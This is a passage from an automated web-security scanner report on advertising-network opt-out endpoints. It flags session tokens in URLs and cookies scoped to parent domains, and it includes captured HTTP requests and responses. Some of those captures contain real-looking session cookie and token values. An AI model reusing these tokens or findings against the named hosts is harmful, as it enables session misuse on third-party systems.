Location: http://nai.adserverec.adtechus.com/nai/daa.php?action_id=2&participant_id=6&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


4.6. http://nai.adserverwc.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=1742489720 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=1742489720

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.nai.adserverwc.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adserverwc.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.nai.adserverwc.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adserverwc.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:54 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:54 GMT;domain=adtechus.com;path=/
Location: http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=2&participant_id=7&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


4.7. http://nai.adsonar.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=174796341 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=174796341; oo_flag=t

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: oo_flag=DELETED; expires=Sat, 12-Nov-2011 15:07:11 GMT; path=/; domain=.nai.adsonar.com
Set-Cookie: oo_flag=DELETED; expires=Sat, 12-Nov-2011 15:07:11 GMT; path=/; domain=.adsonar.com
Set-Cookie: oo_flag=t;expires=Thu, 06-Nov-2036 13:53:51 GMT;domain=adsonar.com;path=/
Location: http://nai.adsonar.com/nai/daa.php?action_id=2&participant_id=1&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


4.8. http://nai.adtech.de/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=194198501 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=194198501

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.nai.adtech.de
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adtech.de
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.nai.adtech.de
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:14 GMT; path=/; domain=.adtech.de
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:54 GMT;domain=adtech.de;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:54 GMT;domain=adtech.de;path=/
Location: http://nai.adtech.de/nai/daa.php?action_id=2&participant_id=3&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


4.9. http://nai.advertising.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=1499749799 HTTP/1.1
Host: nai.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=1499749799; ACID=optout!

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.advertising.com
Set-Cookie: ACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.advertising.com
Set-Cookie: ACID=optout!;expires=Thu, 06-Nov-2036 13:53:52 GMT;domain=advertising.com;path=/
Location: http://nai.advertising.com/nai/daa.php?action_id=2&participant_id=0&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


4.10. http://nai.glb.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=293319859 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=293319859

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.glb.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.glb.adtechus.com
Set-Cookie: JEB2=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.glb.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.glb.adtechus.com
Set-Cookie: OptOut=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.adtechus.com
Set-Cookie: JEB2=NOID;expires=Thu, 06-Nov-2036 13:53:52 GMT;domain=adtechus.com;path=/
Set-Cookie: OptOut=we will not set any more cookies;expires=Thu, 06-Nov-2036 13:53:52 GMT;domain=adtechus.com;path=/
Location: http://nai.glb.adtechus.com/nai/daa.php?action_id=2&participant_id=8&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


4.11. http://nai.tacoda.at.atwola.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=6352754&token=687446498 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=687446498; atdemo=a3ZoYXNyYz05O2t2cj01MDA=; ATTACID=a3Z0aWQ9MTdicjEybTFpMGtyOTU=; ANRTT=; TData=50014|50213|53575|53770|53823|56856|57587|58839|60145|60506|60548; N=2:d41d8cd98f00b204e9800998ecf8427e,33d93519227d7fc0c737bf49aa17226a; ATTAC=a3ZzZWc9NTAwMTQ6NTAyMTM6NTM1NzU6NTM3NzA6NTM4MjM6NTY4NTY6NTc1ODc6NTg4Mzk6NjAxNDU6NjA1MDY6NjA1NDg=; eadx=x

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:53:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: atdemo=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: atdemo=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: atdemo=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: atdemo=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: ATTACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: ATTACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: ATTACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: ATTACID=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: ANRTT=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: ANRTT=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: ANRTT=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: ANRTT=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: TData=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: TData=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: TData=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: TData=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: N=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: N=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: N=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: N=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: ATTAC=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: ATTAC=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: ATTAC=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: ATTAC=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: eadx=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: eadx=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: eadx=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: atdses=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Set-Cookie: atdses=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.tacoda.at.atwola.com
Set-Cookie: atdses=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.at.atwola.com
Set-Cookie: atdses=DELETED; expires=Sat, 12-Nov-2011 15:07:12 GMT; path=/; domain=.atwola.com
Set-Cookie: atdses=O;expires=Thu, 06-Nov-2036 13:53:52 GMT;domain=atwola.com;path=/
Location: http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=2&participant_id=2&is_post_opt_out_check=true&rd=http://advertising.aol.com
Content-Length: 0
Content-Type: text/html


4.12. http://www.networkadvertising.org/managing/optout_results.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Content-Length: 917
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBSQACB=DAINFHGCOAJAKNNELKEDEJJG; __utma=1.531142215.1321210307.1321210307.1321210307.1; __utmb=1; __utmc=1; __utmz=1.1321210307.1.1.utmccn=(referral)|utmcsr=turn.com|utmcct=/|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 18:53:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 12 Nov 2011 18:53:40 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<td valign=top><img src='http://info.yahoo.com/nai/optout.html?token=cVRuZVptSHJ4UjM-' width=15 height=15></td>
...[SNIP]...

4.13. http://www.networkadvertising.org/yahoo_handler  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.networkadvertising.org
Path:   /yahoo_handler

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /yahoo_handler?token=cVRuZVptSHJ4UjM- HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/yahoo_handler?token=cVRuZVptSHJ4UjM-
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBSQACB=DAINFHGCOAJAKNNELKEDEJJG; __utma=1.531142215.1321210307.1321210307.1321210307.1; __utmb=1; __utmc=1; __utmz=1.1321210307.1.1.utmccn=(referral)|utmcsr=turn.com|utmcct=/|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 13 Nov 2011 18:52:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

5. Cookie scoped to parent domain  previous  next
There are 56 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


5.1. http://optout.b3-uk.mookie1.com/optout/nai/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://optout.b3-uk.mookie1.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.b3-uk.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: %2emookie1%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: optouts=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: RMOPTOUT=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: NSC_pqupvu_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: session=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: mdata=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: OAX=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Set-Cookie: ATTABS=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.b3-uk.mookie1.com
Location: http://optout.ib.mookie1.com/optout/nai/?action=optout
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



5.2. http://optout.b3.mookie1.com/optout/nai/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://optout.b3.mookie1.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTABS=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: ATTABS=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: %2emookie1%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: optouts=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: RMOPTOUT=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: NSC_pqupvu_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: session=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: mdata=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Set-Cookie: OAX=deleted; expires=Sat, 13-Nov-2010 18:54:33 GMT; path=/; domain=.b3.mookie1.com
Location: http://optout.b3-uk.mookie1.com/optout/nai/?action=optout
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



5.3. http://optout.ib.mookie1.com/optout/nai/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://optout.ib.mookie1.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout HTTP/1.1
Host: optout.ib.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 302 Found
Date: Sun, 13 Nov 2011 18:54:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: %2emookie1%2ecom/%2f/1/o=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: optouts=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: RMOPTOUT=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: NSC_pqupvu_qppm_iuuq=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: name=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: session=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: mdata=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: OAX=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Set-Cookie: ATTABS=deleted; expires=Sat, 13-Nov-2010 18:54:34 GMT; path=/; domain=.ib.mookie1.com
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8



5.4. http://optout.mookie1.com/optout/nai/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://optout.mookie1.com
Path:   /optout/nai/

